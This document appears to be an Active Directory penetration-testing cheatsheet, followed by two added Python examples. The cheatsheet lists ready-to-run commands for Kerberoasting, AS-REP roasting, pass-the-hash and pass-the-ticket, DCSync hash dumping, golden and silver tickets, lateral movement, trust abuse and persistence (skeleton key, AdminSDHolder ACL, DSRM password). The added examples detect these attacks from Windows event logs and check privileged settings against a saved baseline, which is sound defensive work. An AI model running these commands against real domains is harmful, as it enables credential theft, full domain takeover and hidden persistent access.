Active Directory Cheatsheet
Essential commands for AD enumeration, Kerberos attacks, and domain compromise.
Authorization Required
These commands are for authorized penetration testing only. Unauthorized access to AD environments is illegal.
Domain Enumeration
```powershell
# Get domain info
Get-ADDomain
Get-ADForest
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# Get domain controllers
Get-ADDomainController
nltest /dclist:DOMAIN
# Get domain SID
Get-ADDomain | Select-Object DomainSID
# PowerView - Get domain info
Get-Domain
Get-DomainController
Get-DomainSID
```
User Enumeration
```powershell
# List all users
Get-ADUser -Filter * -Properties *
net user /domain
# Find privileged users
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADGroupMember -Identity "Enterprise Admins" -Recursive
Get-ADGroupMember -Identity "Administrators" -Recursive
# PowerView - User enumeration
Get-DomainUser
Get-DomainUser -SPN        # Kerberoastable users
Get-DomainUser -AdminCount # Protected users (adminCount=1)
Find-LocalAdminAccess      # Hosts where the current user has local admin
# Find users with interesting descriptions
Get-ADUser -Filter * -Properties Description | Where-Object {$_.Description -ne $null}
```
Kerberos Attacks
AS-REP Roasting
```bash
# Find AS-REP roastable users (PowerView)
Get-DomainUser -PreauthNotRequired
# Rubeus - AS-REP Roast
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
# Impacket - AS-REP Roast
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile hashes.txt
# Crack with hashcat
hashcat -m 18200 hashes.txt wordlist.txt
```
Kerberoasting
```bash
# Find kerberoastable users (PowerView)
Get-DomainUser -SPN
# Rubeus - Kerberoast
Rubeus.exe kerberoast /outfile:hashes.txt
# Impacket - Kerberoast
GetUserSPNs.py DOMAIN/user:password -request -outputfile hashes.txt
# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt
```
Pass the Hash/Ticket
```bash
# Pass the Hash with Impacket
psexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
# Pass the Hash with CrackMapExec
cme smb TARGET -u Administrator -H NTLM_HASH -x "whoami"
# Pass the Ticket with Rubeus
Rubeus.exe ptt /ticket:ticket.kirbi
# Pass the Ticket with Impacket
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET
# OverPass the Hash (request a TGT from the NTLM hash)
Rubeus.exe asktgt /user:Administrator /rc4:NTLM_HASH /ptt
```
DCSync Attack
```bash
# DCSync with Mimikatz (requires replication rights)
lsadump::dcsync /domain:DOMAIN /user:krbtgt
lsadump::dcsync /domain:DOMAIN /all /csv
# DCSync with Impacket
secretsdump.py DOMAIN/user:password@DC_IP
secretsdump.py -hashes :NTLM_HASH DOMAIN/Administrator@DC_IP
# Dump the entire AD database (NTLM hashes only)
secretsdump.py DOMAIN/Administrator@DC_IP -just-dc-ntlm
```
Golden & Silver Tickets
Golden Ticket
```bash
# Create Golden Ticket (requires krbtgt hash)
# Mimikatz
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ptt
# Impacket - ticketer
ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain DOMAIN Administrator
# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@DC
```
Silver Ticket
```bash
# Create Silver Ticket (requires service account hash)
# For CIFS (file shares)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER.DOMAIN /rc4:SERVICE_HASH /service:cifs /ptt
# For HTTP (web services)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER.DOMAIN /rc4:SERVICE_HASH /service:http /ptt
# Impacket - ticketer
ticketer.py -nthash SERVICE_HASH -domain-sid DOMAIN_SID -domain DOMAIN -spn cifs/SERVER.DOMAIN Administrator
```
BloodHound Collection
```bash
# SharpHound - Collect all data
SharpHound.exe -c All
# BloodHound Python (remote collection)
bloodhound-python -d DOMAIN -u user -p password -c All -ns DC_IP
# Specific collection methods
SharpHound.exe -c DCOnly  # DC data only
SharpHound.exe -c Session # Session info only
SharpHound.exe -c ACL     # ACL info only
# Loop collection (stealthy)
SharpHound.exe -c Session --loop --loopduration 02:00:00
```
Lateral Movement
```bash
# WinRM
winrs -r:TARGET -u:DOMAIN\user -p:password cmd
Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user
# PsExec
psexec.exe \\TARGET -u DOMAIN\user -p password cmd
psexec.py DOMAIN/user:password@TARGET
# WMI
wmiexec.py DOMAIN/user:password@TARGET
wmic /node:TARGET process call create "cmd.exe /c whoami"
# SMB
smbexec.py DOMAIN/user:password@TARGET
# DCOM
dcomexec.py DOMAIN/user:password@TARGET
```
Trust Abuse
```powershell
# Enumerate trusts
Get-ADTrust -Filter *
Get-DomainTrust
nltest /domain_trusts /all_trusts
# Cross-domain ticket (SID History)
# Needs the child domain krbtgt hash and the parent domain SID
kerberos::golden /user:Administrator /domain:CHILD.DOMAIN /sid:CHILD_SID /krbtgt:CHILD_KRBTGT /sids:PARENT_SID-519 /ptt
# Access parent domain
dir \\parent-dc.parent.domain\c$
```
Domain Persistence
```powershell
# Skeleton Key (requires DC access)
# Patches LSASS so a master password works for any user
privilege::debug
misc::skeleton
# Add user to Domain Admins
net group "Domain Admins" hacker /add /domain
# AdminSDHolder - persistent admin access
# Add user to the AdminSDHolder ACL; SDProp propagates it to protected objects roughly hourly
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity hacker -Rights All
# DSRM Password Change
# Change the DSRM password (can log in as local admin on the DC)
ntdsutil "set dsrm password" "reset password on server null" q q
```
⚠️ Legal Disclaimer
Active Directory attacks can cause significant damage to production environments. Only use these techniques on systems you own or have explicit written authorization to test.
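Added example, not part of the original cheatsheet: the audit-log side of the Kerberos Attacks (AS-REP roasting, Kerberoasting) and DCSync Attack sections above. Each technique leaves a characteristic Windows Security event on the domain controller (4768 for a TGT request, 4769 for a service-ticket request, 4662 for an operation on a directory object), and the three functions below flag the patterns those sections produce. The event records, the `DC0x$`/`MSOL_` allow-list pattern and every account name and IP are constructed for the example; the event field names, encryption-type codes and replication-right GUIDs are the real ones.

```python
"""Audit-log detections for the Kerberos Attacks and DCSync sections of the
cheatsheet. Added example; not part of the original page. Event records are
constructed dicts mirroring the relevant fields of Windows Security events
4768 (TGT request), 4769 (service ticket request) and 4662 (operation on a
directory object); in production they come from a SIEM or Get-WinEvent.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"        # etype 23 (RC4): the type hashcat modes 13100/18200 crack
NO_PREAUTH = "0"         # 4768 PreAuthType 0 = "Logon without Pre-Authentication"
SPN_THRESHOLD, WINDOW = 5, timedelta(minutes=5)
REPLICATION_RIGHTS = {   # extended-right GUIDs a DCSync has to exercise
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
# Constructed allow-list: DCs and a directory-sync account (MSOL_<hex>) replicate by design.
EXPECTED_REPLICATORS = re.compile(r"^(DC0[12]\$|MSOL_[0-9a-f]+)$", re.I)


def detect_asrep_roast(events):
    """Successful 4768 without pre-authentication: the KDC returned an AS-REP
    for an account that has DONT_REQ_PREAUTH set. -> [(account, source_ip)]"""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["EventID"] == 4768 and e["Status"] == "0x0" and e["PreAuthType"] == NO_PREAUTH]


def detect_kerberoast(events):
    """One requester pulling RC4 service tickets for >= SPN_THRESHOLD distinct
    service accounts inside WINDOW. krbtgt and machine accounts ($) are skipped
    because they dominate normal 4769 volume. -> {requester: sorted services}"""
    per_requester = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0" or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        per_requester[e["TargetUserName"]].append((datetime.fromisoformat(e["TimeCreated"]), svc))
    alerts = {}
    for user, reqs in per_requester.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            burst = {s for t, s in reqs[i:] if t - t0 <= WINDOW}
            if len(burst) >= SPN_THRESHOLD:
                alerts[user] = sorted(burst)
                break
    return alerts


def detect_dcsync(events):
    """4662 whose Properties field lists a replication right, exercised by a
    principal outside the allow-list. -> [(DOMAIN\\actor, sorted right names)]"""
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(e["Properties"])}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)
        if rights and not EXPECTED_REPLICATORS.match(e["SubjectUserName"]):
            alerts.append((f"{e['SubjectDomainName']}\\{e['SubjectUserName']}", rights))
    return alerts


def _ev(eid, t, **fields):
    return {"EventID": eid, "TimeCreated": t, "Status": "0x0", **fields}

# Constructed sample: one AS-REP for a pre-auth-disabled account, a normal AES
# TGT, normal AES service traffic, DC-to-DC replication, a sync account,
# a DCSync by an ordinary user, and a six-SPN RC4 burst.
SAMPLE_EVENTS = [
    _ev(4768, "2024-03-01T09:00:01", TargetUserName="svc_backup", IpAddress="10.0.0.55",
        PreAuthType="0", TicketEncryptionType="0x17"),
    _ev(4768, "2024-03-01T09:00:02", TargetUserName="jdoe", IpAddress="10.0.0.21",
        PreAuthType="2", TicketEncryptionType="0x12"),
    _ev(4769, "2024-03-01T09:02:00", TargetUserName="alice@CORP.LOCAL", ServiceName="FS01$",
        TicketEncryptionType="0x12"),
    _ev(4662, "2024-03-01T10:00:00", SubjectUserName="DC02$", SubjectDomainName="CORP",
        Properties="Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"),
    _ev(4662, "2024-03-01T10:00:05", SubjectUserName="jdoe", SubjectDomainName="CORP",
        Properties="Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    _ev(4662, "2024-03-01T10:00:09", SubjectUserName="MSOL_3f2a9c1d", SubjectDomainName="CORP",
        Properties="Control Access\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
] + [
    _ev(4769, f"2024-03-01T09:01:{i:02d}", TargetUserName="jdoe@CORP.LOCAL", ServiceName=svc,
        TicketEncryptionType="0x17")
    for i, svc in enumerate(["svc_sql", "svc_web", "svc_backup", "svc_sharepoint", "svc_exchange", "svc_ci"])
]

if __name__ == "__main__":
    print("AS-REP roast:", detect_asrep_roast(SAMPLE_EVENTS))
    print("Kerberoast bursts:", detect_kerberoast(SAMPLE_EVENTS))
    print("DCSync:", detect_dcsync(SAMPLE_EVENTS))
```

Two prerequisites before trusting these rules: 4662 is only written when the "Audit Directory Service Access" subcategory is enabled and the domain object's SACL audits the replication rights, and 4662 carries no client IP, so an alert has to be correlated with the actor's 4624 logon to find the source host. On the mitigation side, the roasting detections go quiet once service accounts use AES-only keys with long random passwords (or gMSAs) and no account keeps DONT_REQ_PREAUTH set.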
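Added example, not part of the original cheatsheet: baseline-drift checks for the Domain Persistence section above. The three persistence points it lists (a new Domain Admins member, an extra ACE on AdminSDHolder, a usable DSRM password) all show up as a difference between a trusted snapshot and the current state, so the check is a diff against a baseline rather than a log rule. The baselines, current snapshots and principal names (including the `hacker` account the section uses) are constructed; the AdminSDHolder rights set and the meaning of the `DsrmAdminLogonBehavior` values are real.

```python
"""Baseline-drift checks for the Domain Persistence section of the cheatsheet:
Domain Admins membership, the ACL on CN=AdminSDHolder,CN=System and the DSRM
logon policy. Added example; not part of the original page. Baselines and
current snapshots are constructed; in practice they come from Get-ADGroupMember,
Get-Acl on the AD: drive, and the registry value
HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior.
"""

# Rights on AdminSDHolder that SDProp copies (about hourly) onto every
# protected principal, so a grantee ends up controlling all of them.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner",
                   "WriteProperty", "ExtendedRight"}


def group_drift(baseline, current):
    """Members added to / removed from a privileged group since the baseline."""
    return {"added": sorted(set(current) - set(baseline)),
            "removed": sorted(set(baseline) - set(current))}


def adminsdholder_drift(baseline_aces, current_aces):
    """ACEs are (principal, right, 'Allow'|'Deny') tuples. Reports allow-ACEs
    with takeover rights that are not in the baseline, plus any baseline ACE
    that disappeared, which deserves a look of its own."""
    base, cur = set(baseline_aces), set(current_aces)
    unexpected = sorted(a for a in cur - base if a[2] == "Allow" and a[1] in TAKEOVER_RIGHTS)
    return {"unexpected": unexpected, "missing": sorted(base - cur)}


def dsrm_logon_risk(behavior):
    """DsrmAdminLogonBehavior: absent/0 = the DSRM account only works when the
    DC boots into Directory Services Restore Mode; 1 = also while AD DS is
    stopped; 2 = always, i.e. a reset DSRM password becomes a standing local
    admin logon on a running DC."""
    return {None: "ok", 0: "ok", 1: "review", 2: "alert"}.get(behavior, "unknown")


# Constructed baseline and current snapshots.
BASELINE_DA = ["Administrator", "da-alice", "da-bob"]
CURRENT_DA = ["Administrator", "da-alice", "da-bob", "hacker"]

BASELINE_ACES = [
    ("CORP\\Domain Admins", "GenericAll", "Allow"),
    ("CORP\\Enterprise Admins", "GenericAll", "Allow"),
    ("BUILTIN\\Administrators", "GenericAll", "Allow"),
    ("NT AUTHORITY\\SYSTEM", "GenericAll", "Allow"),
    ("NT AUTHORITY\\Authenticated Users", "GenericRead", "Allow"),
]
CURRENT_ACES = BASELINE_ACES + [
    ("CORP\\hacker", "GenericAll", "Allow"),     # what Add-DomainObjectAcl -Rights All leaves behind
    ("CORP\\helpdesk", "GenericRead", "Allow"),  # unexpected but read-only: not a takeover right
]

if __name__ == "__main__":
    print("Domain Admins drift:", group_drift(BASELINE_DA, CURRENT_DA))
    print("AdminSDHolder drift:", adminsdholder_drift(BASELINE_ACES, CURRENT_ACES))
    print("DSRM logon policy:", dsrm_logon_risk(2))
```

Run the diff on a schedule shorter than SDProp's propagation interval, and keep the baseline snapshot somewhere the domain's own admins cannot rewrite, since an attacker with the rights this section describes can edit anything stored in the directory itself.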